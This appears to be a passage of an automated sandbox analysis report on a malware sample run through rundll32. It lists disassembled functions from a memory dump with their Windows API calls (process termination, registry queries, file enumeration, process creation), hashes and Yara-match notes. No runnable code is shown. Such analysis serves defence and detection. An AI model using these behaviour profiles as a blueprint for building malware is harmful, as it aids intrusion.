                                            • Instruction Fuzzy Hash: FE513DB1A10204AFEB64DF99CC8AEAA7FBDEB04310F004455FE04E7290DB75AE45CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581F984 Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlImageNtHeader.NTDLL(?), ref: 0581F99D
                                              • Part of subcall function 058065B6: lstrlenW.KERNEL32(00000000,76CDF560,00000000,?,00000000,?,?,05805512,00000020), ref: 058065E2
                                              • Part of subcall function 058065B6: RtlAllocateHeap.NTDLL(00000000,?), ref: 058065F4
                                              • Part of subcall function 058065B6: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806611
                                              • Part of subcall function 058065B6: lstrlenW.KERNEL32(00000000,?,?,05805512,00000020), ref: 0580661D
                                              • Part of subcall function 058065B6: HeapFree.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806631
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0581F9D5
                                            • CloseHandle.KERNEL32(?), ref: 0581F9E3
                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0581FABC
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0581FACB
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0581FADE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                            • String ID:
                                            • API String ID: 1719504581-0
                                            • Opcode ID: a3c52f7033577c52981db5d79d4867daad322b340bc71edf2ddecffc583cd258
                                            • Instruction ID: f6a1d8809a708d7b339c4b01302bb94af868e1adc9c8469b5997eb7f07bf1881
                                            • Opcode Fuzzy Hash: a3c52f7033577c52981db5d79d4867daad322b340bc71edf2ddecffc583cd258
                                            • Instruction Fuzzy Hash: A9417E36700209ABDB21DFA5D889EAA7F7DBF44714F008025FE06D7250DB74AD84CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581D4B8 Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,?), ref: 0581D513
                                            • GetLastError.KERNEL32 ref: 0581D539
                                            • SetEvent.KERNEL32(00000000), ref: 0581D54C
                                            • GetModuleHandleA.KERNEL32(00000000), ref: 0581D595
                                            • memset.NTDLL ref: 0581D5AA
                                            • RtlExitUserThread.NTDLL(?), ref: 0581D5DF
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                                            • String ID:
                                            • API String ID: 3978817377-0
                                            • Opcode ID: d98a8e9d09ca3b05b1cbb284789e430e76289a78a19114aa4a42b24011a785e1
                                            • Instruction ID: 717159cd44faddba192c646409eb2842e130f16e61e2a06f5aa09698b2ef2c7a
                                            • Opcode Fuzzy Hash: d98a8e9d09ca3b05b1cbb284789e430e76289a78a19114aa4a42b24011a785e1
                                            • Instruction Fuzzy Hash: F24145B1901604AFCB209FA9D888DAABBBDFB856547648919FD07D3110DB30AE84CF25
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581F70B Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4a99d5013f4d13b79fe19497eac723bebeef6f1cda805745db75ae4bfe542aa
                                            • Instruction ID: 2fba987cd5a9eb01f1ba96df0845817795599a0a1c39af6146e1e31f1d801619
                                            • Opcode Fuzzy Hash: d4a99d5013f4d13b79fe19497eac723bebeef6f1cda805745db75ae4bfe542aa
                                            • Instruction Fuzzy Hash: 184187716047159FD730AF65988A92B7BEDFB44325B004A2DFE6AC2280DB70A885CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058024FE Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • lstrlenW.KERNEL32(00000000,?), ref: 05802551
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 05802572
                                            • lstrlenW.KERNEL32(?), ref: 0580259E
                                              • Part of subcall function 05805A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 05805B6A
                                              • Part of subcall function 05805A14: RtlEnterCriticalSection.NTDLL(?), ref: 05805BA0
                                              • Part of subcall function 05805A14: RtlLeaveCriticalSection.NTDLL(?), ref: 05805BBC
                                              • Part of subcall function 05805A14: FindNextFileW.KERNEL32(?,00000000), ref: 05805BD5
                                              • Part of subcall function 05805A14: WaitForSingleObject.KERNEL32(00000000), ref: 05805BE7
                                              • Part of subcall function 05805A14: FindClose.KERNEL32(?), ref: 05805BFC
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805C10
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805C32
                                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 058025BB
                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 058025DC
                                            • PathFindFileNameW.SHLWAPI(0000001E), ref: 058025F1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                            • String ID:
                                            • API String ID: 2670873185-0
                                            • Opcode ID: b8af21315c7cead62cf8fa84658206c0b195844d0f1df630c47f821b0f1aec82
                                            • Instruction ID: c45c8c3c94b170c2b789b2d3cc075adfd96147a577b1aead1e3394738d2a4c67
                                            • Opcode Fuzzy Hash: b8af21315c7cead62cf8fa84658206c0b195844d0f1df630c47f821b0f1aec82
                                            • Instruction Fuzzy Hash: 3E313D725043059FCB61AF68CC8886FBFEAFF88254F105929F996D3150DB31DD498B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05809608 Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000104,05823407,00000000,?,?,058080C4,?,?,?,00000000), ref: 05809624
                                            • lstrlen.KERNEL32(?,00000104,05823407,00000000,?,?,058080C4,?,?,?), ref: 0580963A
                                            • lstrlen.KERNEL32(?,00000104,05823407,00000000,?,?,058080C4,?,?,?), ref: 0580964F
                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 058096B4
                                            • _snprintf.NTDLL ref: 058096DA
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 058096F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateFree_snprintf
                                            • String ID:
                                            • API String ID: 3180502281-0
                                            • Opcode ID: 0c7a0d91895cbdac11691d8712dbe3e64192e4058a9d506ee4dde99ddaa8a412
                                            • Instruction ID: 59a5bb447ddcac9170c9ac7b0667fd888dba8caeaaab7cbaefaaf7062917f59f
                                            • Opcode Fuzzy Hash: 0c7a0d91895cbdac11691d8712dbe3e64192e4058a9d506ee4dde99ddaa8a412
                                            • Instruction Fuzzy Hash: 9531BC72910218FFCF20DFA5DC8889A7FAAFF48254B018426FD15E7111CB71AD90CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058047FF Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05804819
                                            • CreateWaitableTimerA.KERNEL32(05829208,?,?), ref: 05804836
                                            • GetLastError.KERNEL32(?,?), ref: 05804847
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,765BD3B0,76C85520,?,?,?,058021C2,?), ref: 0580EEDC
                                              • Part of subcall function 0580EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 0580EEF0
                                              • Part of subcall function 0580EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,058021C2,?,?,?), ref: 0580EF0A
                                              • Part of subcall function 0580EEA4: RegCloseKey.KERNEL32(?,?,?,?,058021C2,?,?,?), ref: 0580EF34
                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 05804887
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 058048A6
                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 058048BC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                            • String ID:
                                            • API String ID: 1835239314-0
                                            • Opcode ID: 0d0cb3ae8697abe0233efa64f603f46747f3c589c28b2c28bfdd1705ced02a69
                                            • Instruction ID: c143546ed7d164e2d56728ef4b35a9ddab7a4a35c8c495d4ffb563a60377939b
                                            • Opcode Fuzzy Hash: 0d0cb3ae8697abe0233efa64f603f46747f3c589c28b2c28bfdd1705ced02a69
                                            • Instruction Fuzzy Hash: 9E312C71950188EBCF61DF95CC8ACAEBFB9FB85750B108815FE15E6160D730AE84CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058146C8 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,00001003,?,?,?,0580D0A2,?,?,?,00000000,00000000), ref: 058146ED
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0581470F
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05814725
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0581473B
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05814751
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05814767
                                              • Part of subcall function 0580DDDD: memset.NTDLL ref: 0580DE5E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$AllocateHandleHeapModulememset
                                            • String ID:
                                            • API String ID: 1886625739-0
                                            • Opcode ID: c19a24bbf00ba5be5cac3a99d376a6889af4003c0da71dd733c2d59ecfb6c365
                                            • Instruction ID: f462550324692266d587460d39214bfd0c53774cf3cf6fe5d7a21d80c2d5f12b
                                            • Opcode Fuzzy Hash: c19a24bbf00ba5be5cac3a99d376a6889af4003c0da71dd733c2d59ecfb6c365
                                            • Instruction Fuzzy Hash: 63212DB560160AAFDB20DF6AC849D6ABBEDAF15324B058825ED05CB250EB74ED04CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05808C82 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrChrA.SHLWAPI(?,00000020), ref: 05808C9A
                                            • StrChrA.SHLWAPI(00000001,00000020), ref: 05808CAB
                                              • Part of subcall function 0580BF9A: lstrlen.KERNEL32(?,?,00000000,00000000,?,0580C555,00000000,?,?,00000000,00000001), ref: 0580BFAC
                                              • Part of subcall function 0580BF9A: StrChrA.SHLWAPI(?,0000000D,?,0580C555,00000000,?,?,00000000,00000001), ref: 0580BFE4
                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05808CEB
                                            • memcpy.NTDLL(00000000,?,00000007), ref: 05808D18
                                            • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 05808D27
                                            • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 05808D39
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 1819133394-0
                                            • Opcode ID: 53600ac4bcdcb0e6fd7a84ccde44eac4e45847b0b321d8fa671a4abd6befd845
                                            • Instruction ID: 351b4cc01d11450c2ccf23952804f4d430651c3a640fd265f12928bd93d75249
                                            • Opcode Fuzzy Hash: 53600ac4bcdcb0e6fd7a84ccde44eac4e45847b0b321d8fa671a4abd6befd845
                                            • Instruction Fuzzy Hash: E6217A72600209BFDB609B99CC85FAABBACEF18654F048152FD05DB151E770EE858BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05802413 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 05802452
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05802463
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 0580247E
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 05802494
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 058024A6
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 058024BB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                            • String ID:
                                            • API String ID: 1822509305-0
                                            • Opcode ID: bef3acd02122e52996ffa5d659b0ff99214f369dcfce0b60dcf9b5b351951774
                                            • Instruction ID: c9442210a0caa8d36cff565663af24a3e0d0cea91449ccec67e5d207449e4408
                                            • Opcode Fuzzy Hash: bef3acd02122e52996ffa5d659b0ff99214f369dcfce0b60dcf9b5b351951774
                                            • Instruction Fuzzy Hash: DD116D7A501028BBDF725BA5DC49CEF7F7EFF452A0B018061FD0AE2060CA715991DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058032BD Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 058032E5
                                            • _strupr.NTDLL ref: 05803320
                                            • lstrlen.KERNEL32(00000000), ref: 05803328
                                            • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 05803367
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0580336E
                                            • GetLastError.KERNEL32 ref: 05803376
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                            • String ID:
                                            • API String ID: 110452925-0
                                            • Opcode ID: 22a2ce4aab8cc369c1565b4fa66d4683a82806dff12d03b6400e6575efdaf799
                                            • Instruction ID: 1ea1f2f866ee961de42b09f31500560fc1e337c0f97bdba5122080925796cf65
                                            • Opcode Fuzzy Hash: 22a2ce4aab8cc369c1565b4fa66d4683a82806dff12d03b6400e6575efdaf799
                                            • Instruction Fuzzy Hash: 9311B272610204EFDF60AB79AC8EDAA7F6DFB88614B019815FD07D2090DE749D908B71
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580A921 Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?), ref: 0580A93F
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0580A96D
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580A97F
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0580A9A4
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580A9BF
                                            • RegCloseKey.ADVAPI32(?), ref: 0580A9C9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                            • String ID:
                                            • API String ID: 170146033-0
                                            • Opcode ID: fe57d85f0e15fcab54122afa49e052ac4f4498cd9f5087da4f45a5334c767038
                                            • Instruction ID: 8e1c4bd3f187eff7375cfa205580066ed03fd2ac4bb99b7d461e14c7d4ff19ef
                                            • Opcode Fuzzy Hash: fe57d85f0e15fcab54122afa49e052ac4f4498cd9f5087da4f45a5334c767038
                                            • Instruction Fuzzy Hash: 9C11C4B6A10108FFEF219B99DD89DEEBFBDEB48600B108066FD01E2114DA316E55DB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580B865 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B876
                                            • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05804417,?,00000000,000000FF,?,00000F00), ref: 0580B87D
                                            • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0580B88F
                                            • _snprintf.NTDLL ref: 0580B8B5
                                              • Part of subcall function 0580B968: memset.NTDLL ref: 0580B97D
                                              • Part of subcall function 0580B968: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0580B9B6
                                              • Part of subcall function 0580B968: wcstombs.NTDLL ref: 0580B9C0
                                              • Part of subcall function 0580B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0580B9F1
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA1D
                                              • Part of subcall function 0580B968: TerminateProcess.KERNEL32(?,000003E5), ref: 0580BA33
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA47
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7A
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7F
                                            • _snprintf.NTDLL ref: 0580B8E9
                                              • Part of subcall function 0580B968: GetLastError.KERNEL32 ref: 0580BA4B
                                              • Part of subcall function 0580B968: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0580BA6B
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0580B906
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                            • String ID:
                                            • API String ID: 1481739438-0
                                            • Opcode ID: 5d8df506f9a1b7308d5e4bbf00823c7df76d697165501d506ef1f9b26cc8f761
                                            • Instruction ID: 377760be9dc8afe23830eed5482bf95cfae76824789f19e583a7fed1c3397a1b
                                            • Opcode Fuzzy Hash: 5d8df506f9a1b7308d5e4bbf00823c7df76d697165501d506ef1f9b26cc8f761
                                            • Instruction Fuzzy Hash: 72117CB2610219BFDF219F95DC89D9E3F6DEF04360F018111FD0997261DA75AA50CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580A7BF Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A7D5
                                            • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 0580A7E8
                                            • lstrcpy.KERNEL32(00000008,00000000), ref: 0580A80A
                                            • GetLastError.KERNEL32(05805EAE,00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A833
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A84B
                                            • CloseHandle.KERNEL32(00000000,05805EAE,00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 0580A854
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 2860611006-0
                                            • Opcode ID: 7bf7cf1fa123e69c7c2b164f8d80450f8dbd3a6f2d68a869b2005f0961d495de
                                            • Instruction ID: f86dacb052ee83cd870e71acf5de0f202e0c3d7973f098abed5fe3223e8ff18a
                                            • Opcode Fuzzy Hash: 7bf7cf1fa123e69c7c2b164f8d80450f8dbd3a6f2d68a869b2005f0961d495de
                                            • Instruction Fuzzy Hash: 2A119371511309EFDB649FA5DC8A8AA7FBDFB403647008429FC5AC3250DB30AD85CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058166BC Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                            • GetCurrentThreadId.KERNEL32 ref: 058166F4
                                            • GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                            • lstrcpy.KERNEL32(00000000), ref: 05816730
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 1175089793-0
                                            • Opcode ID: 2737aa336c16c00cfec8d4689e856ebb33caa24b6d6e4a9ca286df85696e35ad
                                            • Instruction ID: 505cfc88e22ee8cdf8b7ba12da3f93c02c061a202e98f36c51100b97af32d965
                                            • Opcode Fuzzy Hash: 2737aa336c16c00cfec8d4689e856ebb33caa24b6d6e4a9ca286df85696e35ad
                                            • Instruction Fuzzy Hash: 440184326142156B9B215BAB9C8DD6B7FACEF85A407054519FD05D3100EE70EC41C7B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581AE86 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastmemset
                                            • String ID: vids
                                            • API String ID: 3276359510-3767230166
                                            • Opcode ID: 9f2b96b21be856448ae69f1f3268e159a7bf1a7cb3d54df1d663619ef75188b4
                                            • Instruction ID: dc2fe4d03afb62e9b37c3d4ae216a06a19c179f464ba84691c439a2878947773
                                            • Opcode Fuzzy Hash: 9f2b96b21be856448ae69f1f3268e159a7bf1a7cb3d54df1d663619ef75188b4
                                            • Instruction Fuzzy Hash: 0781F7B1E112299FCF24DFA8C8849ADBBB9BF08710F10856AEC15E7250D7359D41CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05806E8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05806F18
                                            • lstrlen.KERNEL32(?,?), ref: 05806F49
                                            • memcpy.NTDLL(00000008,?,00000001), ref: 05806F58
                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 05806FDA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlenmemcpy
                                            • String ID: W
                                            • API String ID: 379260646-655174618
                                            • Opcode ID: 872e01a6484094a6e4f13fa669a8e3956ce8ec1a13a169b087f26a90eef8e9e7
                                            • Instruction ID: 14bce46ab314f8c1267375b6659613ce1c643139e6b0b6279b8e2553652758bc
                                            • Opcode Fuzzy Hash: 872e01a6484094a6e4f13fa669a8e3956ce8ec1a13a169b087f26a90eef8e9e7
                                            • Instruction Fuzzy Hash: 7C41F6705043099FCB74CF5ADC84BA57FA5BB06344F10902AFD8AC7290E730D9A5CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05808E61 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 05808F0C
                                            • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 05808F79
                                            • GetLastError.KERNEL32(?,00000000,00000000), ref: 05808F83
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
